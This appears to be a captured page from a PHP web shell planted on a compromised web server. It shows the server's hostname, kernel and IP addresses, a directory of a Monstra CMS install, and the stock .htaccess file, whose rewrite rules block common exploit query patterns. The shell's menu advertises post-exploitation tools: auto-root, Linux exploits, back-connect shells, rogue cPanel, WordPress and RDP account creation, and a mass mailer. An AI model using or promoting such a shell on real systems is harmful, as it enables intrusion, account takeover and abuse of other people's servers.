Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 13.58.214.43
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
monstra /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
.htaccess
2.17
KB
-rw-r--r--
changelog.txt
4.67
KB
-rw-r--r--
edit.php
3.53
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
182
B
-rw-r--r--
import.php
2.67
KB
-rw-r--r--
info.xml
2.09
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.72
KB
-rw-r--r--
install.xml
766
B
-rw-r--r--
md5
1.11
KB
-rw-r--r--
notes.txt
493
B
-rw-r--r--
options.table.xml
1.87
KB
-rw-r--r--
upgrade.php
3.37
KB
-rw-r--r--
upgrade.xml
485
B
-rw-r--r--
users.table.xml
528
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# # This file is part of the Monstra. # # (c) Romanenko Sergey / Awilum <awilum@msn.com> # # For the full copyright and license information, please view the LICENSE # file that was distributed with this source code. # # Set default charset utf-8 AddDefaultCharset UTF-8 # PHP 5, Apache 1 and 2. <IfModule mod_php5.c> php_flag magic_quotes_gpc off php_flag magic_quotes_sybase off php_flag register_globals off </IfModule> <IfModule mod_rewrite.c> RewriteEngine on ## Begin - Rewrite rules to block out some common exploits. # If you experience problems on your site block out the operations listed below # This attempts to block the most common type of exploit `attempts` to Monstra # # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR] # Block out any script that includes a <script> tag in URL. RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL. RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL. RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Return 403 Forbidden header and show the content of the root homepage RewriteRule .* index.php [F] # ## End - Rewrite rules to block out some common exploits. ## Begin - Rewrite rules for Monstra RewriteBase [[relativeurl]]/ RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php [QSA,L] ## End - Rewrite rules for Monstra ## Begin - Rewrite rules for SEO improvements. # RewriteCond %{HTTP_HOST} ^www.example.org [NC] # RewriteRule ^(.*)$ http://example.org/$1 [R=301,L] # Redirect 301 /index http://example.org/ ## End - Rewrite rules for SEO improvements. </IfModule> # Prevent visitors from viewing files directly. <FilesMatch "(^#.*#|\.(md|txt|html|tpl|yml|yaml)|~)$"> Order allow,deny Deny from all Satisfy All </FilesMatch> # Allow read files. <Files robots.txt> Allow from all </Files> # Don't show directory listings for URLs which map to a directory. Options -Indexes
Close